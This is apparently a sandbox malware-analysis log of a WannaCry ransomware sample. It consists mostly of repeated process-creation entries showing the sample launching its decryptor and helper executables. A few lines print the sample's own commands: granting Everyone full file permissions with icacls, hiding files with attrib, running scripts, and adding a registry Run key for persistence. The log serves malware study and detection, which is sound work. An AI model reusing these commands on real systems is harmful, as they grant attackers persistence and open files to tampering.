              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Windows\SysWOW64\attrib.exe attrib +h .Jump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls . /grant Everyone:F /T /C /QJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 7551728024260.batJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls . /grant Everyone:F /T /C /QJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Windows\SysWOW64\cscript.exe cscript.exe //nologo m.vbsJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 7551728024260.batJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe coJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c start /b @WanaDecryptor@.exe vsJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "hdahtimfel691" /t REG_SZ /d "\"C:\Users\user\Desktop\tasksche.exe\"" /fJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls . /grant Everyone:F /T /C /QJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Windows\SysWOW64\cscript.exe cscript.exe //nologo m.vbsJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe vsJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Windows\SysWOW64\cscript.exe cscript.exe //nologo m.vbsJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exeJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: unknown unknownJump to behavior
